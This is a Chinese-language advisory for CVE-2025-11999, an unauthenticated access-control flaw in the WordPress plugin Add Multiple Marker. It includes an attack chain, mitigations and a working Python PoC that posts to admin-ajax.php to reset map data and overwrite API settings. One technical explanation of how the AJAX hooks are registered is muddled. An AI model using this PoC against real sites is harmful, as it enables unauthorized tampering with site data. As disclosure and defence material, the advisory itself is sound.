CVE-2025-11999 WordPress Add Multiple Marker插件未授权数据修改漏洞

漏洞信息

漏洞编号

CVE-2025-11999

漏洞类型

访问控制缺失/权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Add Multiple Marker WordPress插件

漏洞概述

CVE-2025-11999是WordPress插件Add Multiple Marker中的一个中等严重性安全漏洞。该插件用于在WordPress网站上添加和管理多个地图标记点。漏洞源于两个核心函数addmultiplemarker_reset_map()和amm_save_map_api()缺少适当的权限检查（capability check），导致任何未经身份验证的用户都可以调用这些敏感函数。此漏洞允许攻击者未经授权修改地图API设置和重置地图数据，可能导致网站地图功能被恶意篡改或服务中断。由于漏洞利用无需认证且可通过网络远程触发，因此存在被大规模利用的风险。

技术细节

漏洞存在于Add Multiple Marker插件的functions.php文件中，具体影响两个AJAX处理函数：addmultiplemarker_reset_map()和amm_save_map_api()。这两个函数在注册WordPress AJAX钩子时未使用wp_ajax_或wp_ajax_nopriv_前缀的正确权限验证机制。正常情况下，WordPress插件应使用current_user_can()或check_ajax_referer()等函数验证用户权限，但该插件直接暴露了数据修改功能。攻击者可通过构造POST请求到wp-admin/admin-ajax.php端点，指定action参数为相应函数名，即可触发地图API更新或地图重置操作。由于缺少nonce验证和权限检查，攻击者可完全控制地图配置参数，可能导致地图服务异常或数据丢失。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装Add Multiple Marker插件（通过目录扫描或特征检测）

STEP 2

步骤2

攻击者构造恶意HTTP POST请求到wp-admin/admin-ajax.php端点

STEP 3

步骤3

指定action参数为addmultiplemarker_reset_map或amm_save_map_api，绕过认证机制

STEP 4

步骤4

服务器执行敏感函数，在无权限验证情况下修改地图配置或重置地图数据

STEP 5

步骤5

攻击成功，地图API被篡改或地图数据被重置，导致服务中断或功能异常

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11999 PoC - Unauthorized data modification in Add Multiple Marker plugin
# Target: WordPress site with Add Multiple Marker plugin <= 1.2

TARGET_URL = "http://target-wordpress-site.com"

def exploit_reset_map():
    """Exploit to reset map data without authentication"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    data = {
        'action': 'addmultiplemarker_reset_map',
        'map_id': '1'
    }
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Map reset request sent successfully")
            print(f"[*] Response: {response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

def exploit_save_map_api():
    """Exploit to modify map API settings without authentication"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    data = {
        'action': 'amm_save_map_api',
        'api_key': 'malicious_api_key',
        'api_type': 'google'
    }
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Map API update request sent successfully")
            print(f"[*] Response: {response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    print("CVE-2025-11999 PoC - Add Multiple Marker Plugin")
    print("Target: Add Multiple Marker <= 1.2")
    print("-" * 50)
    print("[*] Testing map reset vulnerability...")
    exploit_reset_map()
    print("[*] Testing map API modification vulnerability...")
    exploit_save_map_api()

影响范围

Add Multiple Marker WordPress插件 <= 1.2（所有版本）

防御指南

临时缓解措施

在官方补丁发布前，可通过以下方式临时缓解：1）禁用或删除Add Multiple Marker插件；2）使用Web应用防火墙（WAF）规则阻止对admin-ajax.php的异常请求；3）临时限制非管理员用户访问WordPress后台相关功能；4）部署入侵检测系统监控可疑的地图API修改行为。